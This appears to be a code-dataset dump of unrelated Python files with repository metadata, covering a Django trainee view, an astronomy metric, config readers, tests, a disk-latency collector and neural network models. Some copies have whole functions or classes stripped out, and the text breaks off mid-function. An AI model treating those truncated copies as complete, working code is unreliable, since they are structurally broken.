# Bulk add progress to selected trainees
instance = TrainingProgress(evaluated_by=request.user)
form = BulkAddTrainingProgressForm(request.POST, instance=instance)
discard_form = BulkDiscardProgressesForm()
if form.is_valid():
for trainee in form.cleaned_data['trainees']:
TrainingProgress.objects.create(
trainee=trainee,
evaluated_by=request.user,
requirement=form.cleaned_data['requirement'],
state=form.cleaned_data['state'],
discarded=False,
event=form.cleaned_data['event'],
url=form.cleaned_data['url'],
notes=form.cleaned_data['notes'],
)
messages.success(request, 'Successfully changed progress of '
'all selected trainees.')
return redirect(request.get_raw_uri())
else: # GET request
# If the user filters by training, we want to set initial values for
# "requirement" and "training" fields.
training_id = request.GET.get('training', None) or None
try:
initial = {
'event': Event.objects.get(pk=training_id),
'requirement': TrainingRequirement.objects.get(name='Training')
}
except Event.DoesNotExist: # or there is no `training` GET parameter
initial = None
form = BulkAddTrainingProgressForm(initial=initial)
discard_form = BulkDiscardProgressesForm()
context = {'title': 'Trainees',
'all_trainees': trainees,
'swc': Badge.objects.get(name='swc-instructor'),
'dc': Badge.objects.get(name='dc-instructor'),
'lc': Badge.objects.get(name='lc-instructor'),
'filter': filter,
'form': form,
'discard_form': discard_form}
return render(request, 'trainings/all_trainees.html', context)
| 4,600 | 1,529 | 137 |
cda9f963cddac6e0d22909129a807ae43e6470aa | 2,865 | py | Python | rubin_sim/maf/mafContrib/GW170817DetMetric.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | [
"MIT"
] | null | null | null | rubin_sim/maf/mafContrib/GW170817DetMetric.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | [
"MIT"
] | null | null | null | rubin_sim/maf/mafContrib/GW170817DetMetric.py | RileyWClarke/flarubin | eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a | [
"MIT"
] | null | null | null | # Metric for kilonova detectability based on GW170817 SED used in Scolnic et
# al. 2018 and Setzer et al. 2019. The chosen detection criteria are related to
# those used in the LSST DESC white paper detectability work and the two
# references above.
#
# Contact for this code:
# christian.setzer@fysik.su.se
from pathlib import Path
from .transientAsciiSEDMetric import transientAsciiSEDMetric
__all__ = ["GW170817DetMetric"]
base_path = Path(__file__).parent
class GW170817DetMetric(transientAsciiSEDMetric):
"""
Wrapper metric class for GW170817-like kilonovae based on the
transientAsciiSEDMetric. Defaults are set to those corresponding to similar
detection criteria used in Scolnic et al. 2018 and Setzer et al. 2019.
However, due to the simplified nature of transient distribution for
computing this metric, the criteria have been altered to only include
criteria two and three. The chosen redshift is at the approximate mean
redshift of the detected cosmological redshift distribution shown in
Setzer et al. 2019.
Parameters
-----------
ascii_file : str, optional
The ascii file containing the inputs for the SED. The file must
contain three columns - ['phase', 'wave', 'flux'] -
of phase/epoch (in days), wavelength (Angstroms), and
flux (ergs/s/Angstrom). Default, data provided with sims_maf_contrib.
metric_name : str, optional
Name of the metric, can be overwritten by user or child metric.
z: float, optional
Cosmological redshift at which to consider observations of the
tranisent SED. Default 0.08.
num_filters : int, optional
Number of filters that need to be observed for an object to be
counted as detected. Default 2. (if num_per_lightcurve is 0, then
this will be reset to 0).
filter_time : float, optional
The time within which observations in at least num_filters are
required (in days). Default 25.0 days.
num_phases_to_run : int, optional
Sets the number of phases that should be checked.
One can imagine pathological cadences where many objects pass the
detection criteria, but would not if the observations were offset
by a phase-shift. Default 5.
"""
def __init__(
self,
ascii_file=(base_path / "../data/DECAMGemini_SED.txt").resolve(),
metric_name="GW170817DetMetric",
z=0.08,
num_filters=2,
filter_time=25.0,
num_phases_to_run=5,
**kwargs
):
"""
"""
super(GW170817DetMetric, self).__init__(
ascii_file=ascii_file,
metric_name=metric_name,
z=z,
num_filters=num_filters,
filter_time=filter_time,
num_phases_to_run=num_phases_to_run,
**kwargs
)
| 38.716216 | 79 | 0.683421 | # Metric for kilonova detectability based on GW170817 SED used in Scolnic et
# al. 2018 and Setzer et al. 2019. The chosen detection criteria are related to
# those used in the LSST DESC white paper detectability work and the two
# references above.
#
# Contact for this code:
# christian.setzer@fysik.su.se
from pathlib import Path
from .transientAsciiSEDMetric import transientAsciiSEDMetric
__all__ = ["GW170817DetMetric"]
base_path = Path(__file__).parent
class GW170817DetMetric(transientAsciiSEDMetric):
"""
Wrapper metric class for GW170817-like kilonovae based on the
transientAsciiSEDMetric. Defaults are set to those corresponding to similar
detection criteria used in Scolnic et al. 2018 and Setzer et al. 2019.
However, due to the simplified nature of transient distribution for
computing this metric, the criteria have been altered to only include
criteria two and three. The chosen redshift is at the approximate mean
redshift of the detected cosmological redshift distribution shown in
Setzer et al. 2019.
Parameters
-----------
ascii_file : str, optional
The ascii file containing the inputs for the SED. The file must
contain three columns - ['phase', 'wave', 'flux'] -
of phase/epoch (in days), wavelength (Angstroms), and
flux (ergs/s/Angstrom). Default, data provided with sims_maf_contrib.
metric_name : str, optional
Name of the metric, can be overwritten by user or child metric.
z: float, optional
Cosmological redshift at which to consider observations of the
tranisent SED. Default 0.08.
num_filters : int, optional
Number of filters that need to be observed for an object to be
counted as detected. Default 2. (if num_per_lightcurve is 0, then
this will be reset to 0).
filter_time : float, optional
The time within which observations in at least num_filters are
required (in days). Default 25.0 days.
num_phases_to_run : int, optional
Sets the number of phases that should be checked.
One can imagine pathological cadences where many objects pass the
detection criteria, but would not if the observations were offset
by a phase-shift. Default 5.
"""
def __init__(
self,
ascii_file=(base_path / "../data/DECAMGemini_SED.txt").resolve(),
metric_name="GW170817DetMetric",
z=0.08,
num_filters=2,
filter_time=25.0,
num_phases_to_run=5,
**kwargs
):
"""
"""
super(GW170817DetMetric, self).__init__(
ascii_file=ascii_file,
metric_name=metric_name,
z=z,
num_filters=num_filters,
filter_time=filter_time,
num_phases_to_run=num_phases_to_run,
**kwargs
)
| 0 | 0 | 0 |
d7a14ba5f0d62e4479705ffce4dcbd1fd8888727 | 1,622 | py | Python | lib/Config.py | Ch4p34uN0iR/CVE-Scan | d75c8deea53c7c2befd19b66a7f2484201f5f8b6 | [
"BSD-4-Clause"
] | 246 | 2015-01-31T16:21:40.000Z | 2022-03-23T06:58:06.000Z | lib/Config.py | Ch4p34uN0iR/CVE-Scan | d75c8deea53c7c2befd19b66a7f2484201f5f8b6 | [
"BSD-4-Clause"
] | 18 | 2015-02-11T22:24:29.000Z | 2022-01-26T22:43:32.000Z | lib/Config.py | tracid56/CVE-Scan | cf919a67b156fef057835cdde0951e527c486a62 | [
"BSD-4-Clause"
] | 71 | 2015-02-09T04:07:04.000Z | 2022-02-18T13:21:24.000Z | #!/usr/bin/env python3.3
# -*- coding: utf-8 -*-
#
# Read configuration file or return default values
#
# Copyright (c) 2015 NorthernSec
# Copyright (c) 2015 Pieter-Jan Moreels
# This software is licensed under the Original BSD License
# Imports
import os
runpath=os.path.dirname(os.path.realpath(__file__))
import configparser
| 27.491525 | 70 | 0.667078 | #!/usr/bin/env python3.3
# -*- coding: utf-8 -*-
#
# Read configuration file or return default values
#
# Copyright (c) 2015 NorthernSec
# Copyright (c) 2015 Pieter-Jan Moreels
# This software is licensed under the Original BSD License
# Imports
import os
runpath=os.path.dirname(os.path.realpath(__file__))
import configparser
class Configuration():
cp=configparser.ConfigParser()
cp.read(os.path.join(runpath, '../etc/configuration.ini'))
default={'flaskHost': '127.0.0.1', 'flaskPort': 5050,
'flaskDebug': True,
'cve-searchHost':'localhost', 'cve-searchPort':5000,
'cve-searchSSL': False}
@classmethod
def read(cls, section, item, default):
result=default
try:
if type(default) == bool:
result=cls.cp.getboolean(section, item)
elif type(default) == int:
result=cls.cp.getint(section, item)
else:
result=cls.cp.get(section,item)
except:
pass
return result
# Flask
@classmethod
def getFlaskHost(cls):
return cls.read('Webserver','Host',cls.default['flaskHost'])
@classmethod
def getFlaskPort(cls):
return cls.read('Webserver','Port',cls.default['flaskPort'])
@classmethod
def getFlaskDebug(cls):
return cls.read('Webserver','Debug',cls.default['flaskDebug'])
# CVE-Search
@classmethod
def getCVESearch(cls):
h=cls.read('CVE-Search', 'Host', cls.default['cve-searchHost'])
p=cls.read('CVE-Search', 'Port', cls.default['cve-searchPort'])
return (h,p)
@classmethod
def getCVESearchSSL(cls):
return cls.read('CVE-Search', 'SSL', cls.default['cve-searchSSL'])
| 725 | 544 | 23 |
7c5fed6d7a6a960b0030228d0eb5efb838ef3880 | 559 | py | Python | misc/test.py | gingerkirsch/playing-with-python | 5c958b22e13207e65bcaa94a982d71e2fe024e22 | [
"MIT"
] | null | null | null | misc/test.py | gingerkirsch/playing-with-python | 5c958b22e13207e65bcaa94a982d71e2fe024e22 | [
"MIT"
] | null | null | null | misc/test.py | gingerkirsch/playing-with-python | 5c958b22e13207e65bcaa94a982d71e2fe024e22 | [
"MIT"
] | null | null | null | n = 1000
a = list(range(n))
b = dict.fromkeys(range(n))
n = 10
items = range(n)
o_one(items) # 1 operation
o_n(items) # n operations
o_n_squared(items) # n*n = 10 * 10 = 100 operations
| 19.275862 | 51 | 0.595707 | n = 1000
a = list(range(n))
b = dict.fromkeys(range(n))
def o_one(items):
return 1 # 1 operation so O(1)
def o_n(items):
total = 0
# Walks through all items once so O(n)
for item in items:
total += item
return total
def o_n_squared(items):
total = 0
# Walks through all items n*n times so O(n**2)
for a in items:
for b in items:
total += a * b
return total
n = 10
items = range(n)
o_one(items) # 1 operation
o_n(items) # n operations
o_n_squared(items) # n*n = 10 * 10 = 100 operations
| 300 | 0 | 72 |
7449c8ca85a461ad90c59c85503c862e83ebb9ba | 2,173 | py | Python | lib/rapidsms/tests/test_router.py | dimagi/rapidsms-core-dev | aed753545ae01c279489f5a00e7f12ec432e11bf | [
"BSD-3-Clause"
] | null | null | null | lib/rapidsms/tests/test_router.py | dimagi/rapidsms-core-dev | aed753545ae01c279489f5a00e7f12ec432e11bf | [
"BSD-3-Clause"
] | null | null | null | lib/rapidsms/tests/test_router.py | dimagi/rapidsms-core-dev | aed753545ae01c279489f5a00e7f12ec432e11bf | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import time
import threading
from nose.tools import assert_equals, assert_raises
from ..backends.base import BackendBase
from ..apps.base import AppBase
from ..router import Router
| 26.5 | 73 | 0.680166 | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import time
import threading
from nose.tools import assert_equals, assert_raises
from ..backends.base import BackendBase
from ..apps.base import AppBase
from ..router import Router
def test_router_finds_apps():
router = Router()
router.add_app("rapidsms.contrib.default")
from rapidsms.contrib.default.app import App
assert_equals(len(router.apps), 1)
app = router.get_app("rapidsms.contrib.default")
assert_equals(type(app), App)
def test_router_returns_none_on_invalid_apps():
assert_equals(Router().get_app("not.a.valid.app"), None)
def test_router_raises_on_uninstalled_apps():
assert_raises(KeyError, Router().get_app, "rapidsms.contrib.default")
def test_router_starts_and_stops_apps_and_backends():
class MockApp(AppBase):
def start(self):
self.started = True
def stop(self):
self.stopped = True
class MockBackend(BackendBase):
def start(self):
self.started = True
BackendBase.start(self)
def stop(self):
self.stopped = True
BackendBase.stop(self)
router = Router()
app = MockApp(router)
router.apps.append(app)
backend = MockBackend(router, "mock")
router.backends["mock"] = backend
assert hasattr(app, 'started') == False
assert hasattr(app, 'stopped') == False
assert hasattr(backend, 'started') == False
assert hasattr(backend, 'stopped') == False
# start in a separate thread, so we can test it asynchronously.
worker = threading.Thread(target=router.start)
worker.daemon = True
worker.start()
# wait until the router has started.
while not router.running:
time.sleep(0.1)
assert_equals(app.started, True)
assert_equals(backend.started, True)
assert hasattr(app, 'stopped') == False
assert hasattr(backend, 'stopped') == False
# wait until the router has stopped.
router.stop()
worker.join()
assert_equals(app.started, True)
assert_equals(app.stopped, True)
assert_equals(backend.started, True)
assert_equals(backend.stopped, True)
| 1,843 | 0 | 92 |
e7ad85de2ac83380c9e2a40ebc5a66951c7e0ca4 | 1,927 | py | Python | ioping/ioping.py | annttu/Diamond-collectors | 9abe896f5702418136d609f907270b1efa26c491 | [
"MIT",
"Unlicense"
] | null | null | null | ioping/ioping.py | annttu/Diamond-collectors | 9abe896f5702418136d609f907270b1efa26c491 | [
"MIT",
"Unlicense"
] | 1 | 2016-11-01T13:43:11.000Z | 2016-11-02T06:50:01.000Z | ioping/ioping.py | annttu/Diamond-collectors | 9abe896f5702418136d609f907270b1efa26c491 | [
"MIT",
"Unlicense"
] | null | null | null |
"""
IOPing plugin for Diamond.
Author: Antti Jaakkola
#### Dependencies
* ioping
Create /usr/share/diamond/collectors/ioping directory and copy this plugin to it.
mkdir /usr/share/diamond/collectors/ioping
cp ioping/ioping.py /usr/share/diamond/collectors/ioping/
Create config file /etc/diamond/collectors/IOPing.conf with content:
enabled=True
Enjoy statistics!
"""
import diamond.collector
import subprocess
| 26.040541 | 89 | 0.585885 |
"""
IOPing plugin for Diamond.
Author: Antti Jaakkola
#### Dependencies
* ioping
Create /usr/share/diamond/collectors/ioping directory and copy this plugin to it.
mkdir /usr/share/diamond/collectors/ioping
cp ioping/ioping.py /usr/share/diamond/collectors/ioping/
Create config file /etc/diamond/collectors/IOPing.conf with content:
enabled=True
Enjoy statistics!
"""
import diamond.collector
import subprocess
class IOPingCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(IOPingCollector, self).get_default_config_help()
config_help.update({
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(IOPingCollector, self).get_default_config()
config.update({
'path': 'ioping',
'directory': '/tmp'
})
self.arcstat = None
return config
def collect(self):
"""
Overrides the Collector.collect method
"""
path = self.config['directory']
interval = int(self.config['interval']) / 3
try:
output = subprocess.check_output(['ioping', '-w', str(interval), '-q', path])
except subprocess.CalledProcessError, err:
self.log.info(
'Could not get stats: %s' % err)
self.log.exception('Could not get stats')
return {}
for line in output.splitlines():
if line.startswith('min/avg/max/mdev'):
# min/avg/max/mdev = 243 us / 438 us / 552 us / 92 us
values = line.split("=")[1]
values = dict(zip(['min', 'avg', 'max', 'mdev'],
[int(x.split()[0].strip()) for x in values.split("/")]))
for key, value in values.items():
self.publish(key, value)
| 157 | 1,320 | 23 |
fbb1ede1e97a9d60cbdc658c4844084f3866d59b | 1,948 | py | Python | gfsa/datasets/mazes/maze_task.py | muell-monster/google-research | 04d2024f4723bc4be3d639a668c19fb1f6a31478 | [
"Apache-2.0"
] | 3 | 2021-01-18T04:46:49.000Z | 2021-03-05T09:21:40.000Z | gfsa/datasets/mazes/maze_task.py | Alfaxad/google-research | 2c0043ecd507e75e2df9973a3015daf9253e1467 | [
"Apache-2.0"
] | 7 | 2021-11-10T19:44:38.000Z | 2022-02-10T06:48:39.000Z | gfsa/datasets/mazes/maze_task.py | Alfaxad/google-research | 2c0043ecd507e75e2df9973a3015daf9253e1467 | [
"Apache-2.0"
] | 4 | 2021-02-08T10:25:45.000Z | 2021-04-17T14:46:26.000Z | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Constants and functions for maze task."""
from typing import List, Tuple
from gfsa import automaton_builder
from gfsa import graph_types
from gfsa.datasets import graph_bundle
from gfsa.datasets.mazes import maze_schema
DIRECTION_ORDERING = "LRUD"
def maze_primitive_edges(
maze_graph
):
"""Build a graph bundle for a given maze.
Args:
maze_graph: Encoded graph representing the maze.
Returns:
List of edges corresponding to primitive actions in the maze.
"""
primitives = []
for node_id, node_info in maze_graph.items():
for i, direction in enumerate(DIRECTION_ORDERING):
out_key = graph_types.OutEdgeType(f"{direction}_out")
if out_key in node_info.out_edges:
dest, = node_info.out_edges[out_key]
primitives.append((node_id, dest.node_id, i))
else:
primitives.append((node_id, node_id, i))
return primitives
SCHEMA = maze_schema.build_maze_schema(2)
# Backtracking doesn't make sense for maze environment.
BUILDER = automaton_builder.AutomatonBuilder(SCHEMA, with_backtrack=False)
PADDING_CONFIG = graph_bundle.PaddingConfig(
static_max_metadata=automaton_builder.EncodedGraphMetadata(
num_nodes=256, num_input_tagged_nodes=512),
max_initial_transitions=512,
max_in_tagged_transitions=2048,
max_edges=1024)
| 29.969231 | 74 | 0.754107 | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Constants and functions for maze task."""
from typing import List, Tuple
from gfsa import automaton_builder
from gfsa import graph_types
from gfsa.datasets import graph_bundle
from gfsa.datasets.mazes import maze_schema
DIRECTION_ORDERING = "LRUD"
def maze_primitive_edges(
maze_graph
):
"""Build a graph bundle for a given maze.
Args:
maze_graph: Encoded graph representing the maze.
Returns:
List of edges corresponding to primitive actions in the maze.
"""
primitives = []
for node_id, node_info in maze_graph.items():
for i, direction in enumerate(DIRECTION_ORDERING):
out_key = graph_types.OutEdgeType(f"{direction}_out")
if out_key in node_info.out_edges:
dest, = node_info.out_edges[out_key]
primitives.append((node_id, dest.node_id, i))
else:
primitives.append((node_id, node_id, i))
return primitives
SCHEMA = maze_schema.build_maze_schema(2)
# Backtracking doesn't make sense for maze environment.
BUILDER = automaton_builder.AutomatonBuilder(SCHEMA, with_backtrack=False)
PADDING_CONFIG = graph_bundle.PaddingConfig(
static_max_metadata=automaton_builder.EncodedGraphMetadata(
num_nodes=256, num_input_tagged_nodes=512),
max_initial_transitions=512,
max_in_tagged_transitions=2048,
max_edges=1024)
| 0 | 0 | 0 |
6279ab1a4ff19e5eafe90e482015ee5b59aa4654 | 1,252 | py | Python | spotfinder/applications/image_viewer.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | spotfinder/applications/image_viewer.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | spotfinder/applications/image_viewer.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | from __future__ import absolute_import, division, print_function
from spotfinder.applications.wrappers import DistlOrganizer
"Later go back and refactor this module and signal_strength to avoid code duplication."
| 37.939394 | 92 | 0.729233 | from __future__ import absolute_import, division, print_function
from spotfinder.applications.wrappers import DistlOrganizer
class Empty: pass
"Later go back and refactor this module and signal_strength to avoid code duplication."
class run_signal_strength_class(DistlOrganizer):
def __init__(self,params):
E = Empty()
E.argv=['Empty']
E.argv.append(params.distl.image)
self.verbose = params.distl.verbose
if params.distl.res.inner!=None:
params.distl_lowres_limit = params.distl.res.inner
if params.distl.res.outer!=None:
params.force_method2_resolution_limit = params.distl.res.outer
params.distl_highres_limit = params.distl.res.outer
params.distl_force_binning = False
params.distl_permit_binning = False
params.wedgelimit = len(E.argv)
params.spotfinder_header_tests = False
DistlOrganizer.__init__(self,verbose = True, argument_module=E,
phil_params=params)
self.S = None # need to initialize determined by class SpotFrame
def view(self):
from rstbx.viewer.spotfinder_wrap import spot_wrapper
spot_wrapper(working_phil=self.phil_params).display(path = self.phil_params.distl.image,
organizer = self)
| 920 | 23 | 95 |
c4adb1ab10a5473e3829d2a1d242f1a18f0f49f3 | 3,608 | py | Python | predict/predictions.py | JohanObluda/ntua-slp-semeval2018 | c9c3ad2c05b4b4ea849dee0db13c3f02b52929b6 | [
"MIT"
] | 84 | 2018-05-25T08:26:38.000Z | 2021-12-23T06:15:08.000Z | predict/predictions.py | JohanObluda/ntua-slp-semeval2018 | c9c3ad2c05b4b4ea849dee0db13c3f02b52929b6 | [
"MIT"
] | 16 | 2018-06-06T15:09:45.000Z | 2022-01-15T09:17:14.000Z | predict/predictions.py | JohanObluda/ntua-slp-semeval2018 | c9c3ad2c05b4b4ea849dee0db13c3f02b52929b6 | [
"MIT"
] | 33 | 2018-06-05T18:13:29.000Z | 2022-02-04T00:54:12.000Z | import json
import os
import numpy
from torch.utils.data import DataLoader
from config import DEVICE, ATT_PATH
from logger.training import predict
from modules.nn.dataloading import WordDataset, CharDataset
from utils.nlp import twitter_preprocess
from utils.train import load_embeddings, get_pipeline
def predictions(task, model, config, data, label_transformer=None,
batch_size=128, preprocessor=None, name=None):
"""
Args:
task (): available tasks
- "clf": multiclass classification
- "bclf": binary classification
- "mclf": multilabel classification
- "reg": regression
model ():
config ():
data ():
label_transformer ():
batch_size ():
num_workers ():
Returns:
"""
word2idx = None
if config["op_mode"] == "word":
word2idx, idx2word, embeddings = load_embeddings(config)
# dummy scores if order to utilize Dataset classes as they are
dummy_y = [0] * len(data)
if config["op_mode"] == "word":
if preprocessor is None:
preprocessor = twitter_preprocess()
dataset = WordDataset(data, dummy_y, word2idx,
name=name,
preprocess=preprocessor,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
elif config["op_mode"] == "char":
print("Building char-level datasets...")
dataset = CharDataset(data, dummy_y, name=name,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
else:
raise ValueError("Invalid op_mode")
model.to(DEVICE)
pipeline = get_pipeline(task=task, eval=True)
avg_loss, (dummy_y, pred), posteriors, attentions = predict(model,
pipeline,
loader,
task,
"eval")
return pred, posteriors, attentions, loader.dataset.data
| 34.361905 | 79 | 0.509978 | import json
import os
import numpy
from torch.utils.data import DataLoader
from config import DEVICE, ATT_PATH
from logger.training import predict
from modules.nn.dataloading import WordDataset, CharDataset
from utils.nlp import twitter_preprocess
from utils.train import load_embeddings, get_pipeline
def dump_attentions(X, y, name, model, conf, task):
pred, posteriors, attentions, tokens = predictions(task, model, conf, X,
name=name)
data = []
for tweet, label, prediction, posterior, attention in zip(tokens, y,
pred, posteriors,
attentions):
if task == "mclf":
label = numpy.array(label)
prediction = numpy.array(prediction).astype(label.dtype)
item = {
"text": tweet,
"label": label.tolist(),
"prediction": prediction.tolist(),
"posterior": numpy.array(posterior).tolist(),
"attention": numpy.array(attention).tolist(),
}
elif task in ["clf", "bclf", "reg"]:
item = {
"text": tweet,
"label": label,
"prediction": type(label)(prediction),
"posterior": posterior,
"attention": attention,
}
else:
raise ValueError("Task not implemented!")
data.append(item)
with open(os.path.join(ATT_PATH, "{}.json".format(name)), 'w') as f:
json.dump(data, f, indent=4, separators=(',', ': '))
def predictions(task, model, config, data, label_transformer=None,
batch_size=128, preprocessor=None, name=None):
"""
Args:
task (): available tasks
- "clf": multiclass classification
- "bclf": binary classification
- "mclf": multilabel classification
- "reg": regression
model ():
config ():
data ():
label_transformer ():
batch_size ():
num_workers ():
Returns:
"""
word2idx = None
if config["op_mode"] == "word":
word2idx, idx2word, embeddings = load_embeddings(config)
# dummy scores if order to utilize Dataset classes as they are
dummy_y = [0] * len(data)
if config["op_mode"] == "word":
if preprocessor is None:
preprocessor = twitter_preprocess()
dataset = WordDataset(data, dummy_y, word2idx,
name=name,
preprocess=preprocessor,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
elif config["op_mode"] == "char":
print("Building char-level datasets...")
dataset = CharDataset(data, dummy_y, name=name,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
else:
raise ValueError("Invalid op_mode")
model.to(DEVICE)
pipeline = get_pipeline(task=task, eval=True)
avg_loss, (dummy_y, pred), posteriors, attentions = predict(model,
pipeline,
loader,
task,
"eval")
return pred, posteriors, attentions, loader.dataset.data
| 1,341 | 0 | 23 |
2cd61fe31658cc3071428c898c6644d5725bf290 | 18,647 | py | Python | src/models/cifar.py | kirk86/bdlood | 227aaf08585e467415c32235805c8fd17e7484ee | [
"MIT"
] | 1 | 2021-08-30T23:51:02.000Z | 2021-08-30T23:51:02.000Z | src/models/cifar.py | kirk86/bdlood | 227aaf08585e467415c32235805c8fd17e7484ee | [
"MIT"
] | null | null | null | src/models/cifar.py | kirk86/bdlood | 227aaf08585e467415c32235805c8fd17e7484ee | [
"MIT"
] | null | null | null | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
"""
modified to fit dataset size
"""
class ResNeXtBottleneck(nn.Module):
"""
RexNeXt bottleneck type C (https://github.com/facebookresearch/ResNeXt/blob/master/models/resnext.lua)
"""
def __init__(self, in_channels, out_channels, stride, cardinality,
base_width, widen_factor):
""" Constructor
Args:
in_channels: input channel dimensionality
out_channels: output channel dimensionality
stride: conv stride. Replaces pooling layer.
cardinality: num of convolution groups.
base_width: base number of channels in each group.
widen_factor: factor to reduce the input dimensionality
before convolution.
"""
super(ResNeXtBottleneck, self).__init__()
width_ratio = out_channels / (widen_factor * 64.)
D = cardinality * int(base_width * width_ratio)
self.conv_reduce = nn.Conv2d(in_channels, D, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_reduce = nn.BatchNorm2d(D)
self.conv_conv = nn.Conv2d(D, D, kernel_size=3, stride=stride,
padding=1, groups=cardinality, bias=False)
self.bn = nn.BatchNorm2d(D)
self.conv_expand = nn.Conv2d(D, out_channels, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_expand = nn.BatchNorm2d(out_channels)
self.shortcut = nn.Sequential()
if in_channels != out_channels:
self.shortcut.add_module('shortcut_conv',
nn.Conv2d(in_channels, out_channels,
kernel_size=1, stride=stride,
padding=0,
bias=False))
self.shortcut.add_module('shortcut_bn', nn.BatchNorm2d(out_channels))
class CifarResNeXt(nn.Module):
"""
ResNext optimized for the Cifar dataset, as specified in
https://arxiv.org/pdf/1611.05431.pdf
"""
def __init__(self, cardinality, depth, nlabels, base_width, widen_factor=4):
""" Constructor
Args:
cardinality: number of convolution groups.
depth: number of layers.
nlabels: number of classes
base_width: base number of channels in each group.
widen_factor: factor to adjust the channel dimensionality
"""
super(CifarResNeXt, self).__init__()
self.cardinality = cardinality
self.depth = depth
self.block_depth = (self.depth - 2) // 9
self.base_width = base_width
self.widen_factor = widen_factor
self.nlabels = nlabels
self.output_size = 64
self.stages = [64, 64 * self.widen_factor, 128 * self.widen_factor, 256 * self.widen_factor]
self.conv_1_3x3 = nn.Conv2d(3, 64, 3, 1, 1, bias=False)
self.bn_1 = nn.BatchNorm2d(64)
self.stage_1 = self.block('stage_1', self.stages[0], self.stages[1], 1)
self.stage_2 = self.block('stage_2', self.stages[1], self.stages[2], 2)
self.stage_3 = self.block('stage_3', self.stages[2], self.stages[3], 2)
self.classifier = nn.Linear(self.stages[3], nlabels)
nn.init.kaiming_normal(self.classifier.weight)
for key in self.state_dict():
if key.split('.')[-1] == 'weight':
if 'conv' in key:
nn.init.kaiming_normal(self.state_dict()[key], mode='fan_out')
if 'bn' in key:
self.state_dict()[key][...] = 1
elif key.split('.')[-1] == 'bias':
self.state_dict()[key][...] = 0
def block(self, name, in_channels, out_channels, pool_stride=2):
""" Stack n bottleneck modules where n is inferred from the depth of the network.
Args:
name: string name of the current block.
in_channels: number of input channels
out_channels: number of output channels
pool_stride: factor to reduce the spatial dimensionality in the first bottleneck of the block.
Returns: a Module consisting of n sequential bottlenecks.
"""
block = nn.Sequential()
for bottleneck in range(self.block_depth):
name_ = '%s_bottleneck_%d' % (name, bottleneck)
if bottleneck == 0:
block.add_module(name_, ResNeXtBottleneck(in_channels,
out_channels,
pool_stride,
self.cardinality,
self.base_width,
self.widen_factor))
else:
block.add_module(name_,
ResNeXtBottleneck(out_channels, out_channels,
1, self.cardinality,
self.base_width,
self.widen_factor))
return block
class Bottleneck(nn.Module):
'''Dual Path Networks in PyTorch.'''
# test()
| 37.071571 | 106 | 0.561055 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
"""
modified to fit dataset size
"""
class ResNeXtBottleneck(nn.Module):
"""
RexNeXt bottleneck type C (https://github.com/facebookresearch/ResNeXt/blob/master/models/resnext.lua)
"""
def __init__(self, in_channels, out_channels, stride, cardinality,
base_width, widen_factor):
""" Constructor
Args:
in_channels: input channel dimensionality
out_channels: output channel dimensionality
stride: conv stride. Replaces pooling layer.
cardinality: num of convolution groups.
base_width: base number of channels in each group.
widen_factor: factor to reduce the input dimensionality
before convolution.
"""
super(ResNeXtBottleneck, self).__init__()
width_ratio = out_channels / (widen_factor * 64.)
D = cardinality * int(base_width * width_ratio)
self.conv_reduce = nn.Conv2d(in_channels, D, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_reduce = nn.BatchNorm2d(D)
self.conv_conv = nn.Conv2d(D, D, kernel_size=3, stride=stride,
padding=1, groups=cardinality, bias=False)
self.bn = nn.BatchNorm2d(D)
self.conv_expand = nn.Conv2d(D, out_channels, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_expand = nn.BatchNorm2d(out_channels)
self.shortcut = nn.Sequential()
if in_channels != out_channels:
self.shortcut.add_module('shortcut_conv',
nn.Conv2d(in_channels, out_channels,
kernel_size=1, stride=stride,
padding=0,
bias=False))
self.shortcut.add_module('shortcut_bn', nn.BatchNorm2d(out_channels))
def forward(self, x):
bottleneck = self.conv_reduce.forward(x)
bottleneck = F.relu(self.bn_reduce.forward(bottleneck), inplace=True)
bottleneck = self.conv_conv.forward(bottleneck)
bottleneck = F.relu(self.bn.forward(bottleneck), inplace=True)
